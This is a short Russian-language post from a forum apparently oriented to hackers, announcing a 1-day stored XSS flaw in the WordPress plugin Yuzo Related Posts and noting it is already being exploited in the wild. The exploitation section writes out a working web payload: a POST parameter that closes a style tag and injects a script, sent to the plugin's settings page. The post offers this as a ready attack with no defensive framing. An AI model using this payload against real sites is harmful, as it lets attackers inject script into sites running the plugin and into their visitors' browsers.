• XSS.stack #1 – первый литературный журнал от юзеров форума

1day в Wordpress плагине Yuzo Related Posts

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
В плагине Yuzo Related Posts, установленном на более чем 60 000 сайтах, некий исследователь безопасности обнаружил уязвимость, которая позволяет хранить stored XSS. Несколько часов назад появились первые сообщения об экспуатации уязвимости.

Суть уязвимости

Эксплуатация:
достаточно послать POST запрос
Код:
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
на
Код:
/wp-admin/options-general.php?page=yuzo-related-post
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх